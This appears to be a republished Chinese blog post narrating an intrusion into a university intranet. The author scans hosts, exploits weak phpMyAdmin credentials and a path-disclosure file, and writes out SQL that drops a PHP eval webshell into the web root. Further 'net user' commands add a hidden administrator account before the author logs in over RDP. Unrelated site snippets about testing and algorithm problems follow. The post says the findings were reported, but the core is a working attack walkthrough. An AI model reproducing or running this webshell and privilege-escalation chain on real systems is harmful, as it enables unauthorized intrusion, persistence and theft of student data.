[xueqi]在校园内网中的一次简单渗透测试

2023-11-05 23:40

本文主要是介绍[xueqi]在校园内网中的一次简单渗透测试,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

首先设备接入在学校内网,lan网络的掩码是255.255.252.0 我的ip为10.3.16.*

开启扫描器扫了一遍自己网段机器,由于周末发现存活的ip很少,果断扩大扫描网络,增加网络号区间。

一通扫描发现大量的存活的主机,对几个常用端口扫描,发现几个投影仪存活,存在80端口,小伙伴简单研究下,发现web控制界面弱口令,然后可以进行开关机,调节参数等权限。

还发现大量开启135,138,139,445,3389,80,8080等端口的主机,瞬间激动了,知道学校内网安全特差,没想到这么差,小伙伴立刻想到几个高危洞,比如永恒之蓝。

经过嗅探发现内网大多是win7,少量xp,2003,2008,少量开着22的集成设备,路由等设备。

甚至还发现了校园监控的海康录像机ip,简单试了web和ssh下并不存在弱口令。

找到学校内网的oa学籍系统,对主机进行探测,win08sever系统,开了3389,80(学籍系统),8080(某教师xx系统),并未对上述服务进行任何测试,嗅探下,发现此主机竟然还存在在wan上的学校官网(两年前在wan对学校探测过,大量使用cms,基本上一个教学单位和行政部门一个cms,少数弱口令,网站有安全狗)做到这步,只是搜集了主机信息,并未作任何进一步测试,这也让我想明白早年学校一件事。

早几年某天学校通知有一女生收到助学金为由的诈骗电话,家人上当造成经济损失。学校提前通报大量学生家长大量收到来自广西口音的,以“助学金激活先交钱”为借口的诈骗电话,并能完整报出学生姓名,身份证,住址,手机,班级,学号,家长姓名,手机等信息。

当时遭遇此事,我从我搞安全的嗅觉中就觉得一定是学生学籍信息被泄露了。一直以为学籍系统是独立在内网的,一定是从校内职工泄露的。这次更加肯定了学籍被脱裤的推测,推断:攻击者在公网成功入侵学校网站,提权获得主机权限,发现学籍系统脱裤,出售给东南亚地区电诈黑产集团,电诈利用,学生受骗。。。

回到正题,发现大量开着80端口 http服务主机,以及开启了3389,发现一个是经管的竞赛答题平台。扫描后,80 一个cms站,8080一个cms站,445,3389开启。

nw01.png

对网页进行了检查并不sql注入,后台进行弱口令试探,又失败。扫描了一下目录,发现有phpmyadmin数据库web管理后台。甚至于目录下还有数据库备份sql文件。

弱口令进入!想起来sql语句可以直接在目录生成文件,但是不知道网站真实路径,在网页上各种加参数,让其报错,但是只暴露相对路径,并没有爆出绝对路径。经过百度phpmyadmin漏洞,发现有几个文件可以爆出绝对路径,果断试探之后,拿到绝对路径。

http://url/phpmyadmin/themes/darkblue_orange/layout.inc.php

Fatal error: Call to a member function getImgPath() on a non-object in

D:AppServwwwphpMyAdminthemesdarkblue_orangelayout.inc.php on line 67

有了绝对路径,就可以sql命令生成文件了

命令如下(先创建表,里面插入一句话木马,然后查询输出到文件。)

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php eval($_POST[cxk]);?>');

select cmd from a into outfile 'C:Program FilesphpStudywwwmbsuning4x.php';

Drop TABLE IF EXISTS a;

nw02.png

权限真大,菜刀成功连接上,然后上传个大马再运行dos命令添加用户。

nw03.png

Net user cxk pass /add 
net loaclgroup administrators 用户名 /add

然后就有管理员权限了。

3389上去,就能搞事情了

nw04.png

至此并未做进一步测试,并及时汇报给学校相关领导!!!

转载请注明作者[Xueqi]与出处!

这篇关于[xueqi]在校园内网中的一次简单渗透测试的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/353197

相关文章

性能测试介绍

性能测试是一种测试方法,旨在评估系统、应用程序或组件在现实场景中的性能表现和可靠性。它通常用于衡量系统在不同负载条件下的响应时间、吞吐量、资源利用率、稳定性和可扩展性等关键指标。 为什么要进行性能测试 通过性能测试,可以确定系统是否能够满足预期的性能要求,找出性能瓶颈和潜在的问题,并进行优化和调整。 发现性能瓶颈:性能测试可以帮助发现系统的性能瓶颈,即系统在高负载或高并发情况下可能出现的问题

字节面试 | 如何测试RocketMQ、RocketMQ?

字节面试:RocketMQ是怎么测试的呢? 答: 首先保证消息的消费正确、设计逆向用例,在验证消息内容为空等情况时的消费正确性; 推送大批量MQ,通过Admin控制台查看MQ消费的情况,是否出现消费假死、TPS是否正常等等问题。(上述都是临场发挥,但是RocketMQ真正的测试点,还真的需要探讨) 01 先了解RocketMQ 作为测试也是要简单了解RocketMQ。简单来说,就是一个分

csu 1446 Problem J Modified LCS (扩展欧几里得算法的简单应用)

这是一道扩展欧几里得算法的简单应用题,这题是在湖南多校训练赛中队友ac的一道题,在比赛之后请教了队友,然后自己把它a掉 这也是自己独自做扩展欧几里得算法的题目 题意:把题意转变下就变成了:求d1*x - d2*y = f2 - f1的解,很明显用exgcd来解 下面介绍一下exgcd的一些知识点:求ax + by = c的解 一、首先求ax + by = gcd(a,b)的解 这个

hdu2289(简单二分)

虽说是简单二分,但是我还是wa死了  题意:已知圆台的体积,求高度 首先要知道圆台体积怎么求:设上下底的半径分别为r1,r2,高为h,V = PI*(r1*r1+r1*r2+r2*r2)*h/3 然后以h进行二分 代码如下: #include<iostream>#include<algorithm>#include<cstring>#include<stack>#includ

usaco 1.3 Prime Cryptarithm(简单哈希表暴搜剪枝)

思路: 1. 用一个 hash[ ] 数组存放输入的数字,令 hash[ tmp ]=1 。 2. 一个自定义函数 check( ) ,检查各位是否为输入的数字。 3. 暴搜。第一行数从 100到999,第二行数从 10到99。 4. 剪枝。 代码: /*ID: who jayLANG: C++TASK: crypt1*/#include<stdio.h>bool h

【测试】输入正确用户名和密码,点击登录没有响应的可能性原因

目录 一、前端问题 1. 界面交互问题 2. 输入数据校验问题 二、网络问题 1. 网络连接中断 2. 代理设置问题 三、后端问题 1. 服务器故障 2. 数据库问题 3. 权限问题: 四、其他问题 1. 缓存问题 2. 第三方服务问题 3. 配置问题 一、前端问题 1. 界面交互问题 登录按钮的点击事件未正确绑定,导致点击后无法触发登录操作。 页面可能存在

uva 10387 Billiard(简单几何)

题意是一个球从矩形的中点出发,告诉你小球与矩形两条边的碰撞次数与小球回到原点的时间,求小球出发时的角度和小球的速度。 简单的几何问题,小球每与竖边碰撞一次,向右扩展一个相同的矩形;每与横边碰撞一次,向上扩展一个相同的矩形。 可以发现,扩展矩形的路径和在当前矩形中的每一段路径相同,当小球回到出发点时,一条直线的路径刚好经过最后一个扩展矩形的中心点。 最后扩展的路径和横边竖边恰好组成一个直

业务中14个需要进行A/B测试的时刻[信息图]

在本指南中,我们将全面了解有关 A/B测试 的所有内容。 我们将介绍不同类型的A/B测试,如何有效地规划和启动测试,如何评估测试是否成功,您应该关注哪些指标,多年来我们发现的常见错误等等。 什么是A/B测试? A/B测试(有时称为“分割测试”)是一种实验类型,其中您创建两种或多种内容变体——如登录页面、电子邮件或广告——并将它们显示给不同的受众群体,以查看哪一种效果最好。 本质上,A/B测

poj 1113 凸包+简单几何计算

题意: 给N个平面上的点,现在要在离点外L米处建城墙,使得城墙把所有点都包含进去且城墙的长度最短。 解析: 韬哥出的某次训练赛上A出的第一道计算几何,算是大水题吧。 用convexhull算法把凸包求出来,然后加加减减就A了。 计算见下图: 好久没玩画图了啊好开心。 代码: #include <iostream>#include <cstdio>#inclu

uva 10130 简单背包

题意: 背包和 代码: #include <iostream>#include <cstdio>#include <cstdlib>#include <algorithm>#include <cstring>#include <cmath>#include <stack>#include <vector>#include <queue>#include <map>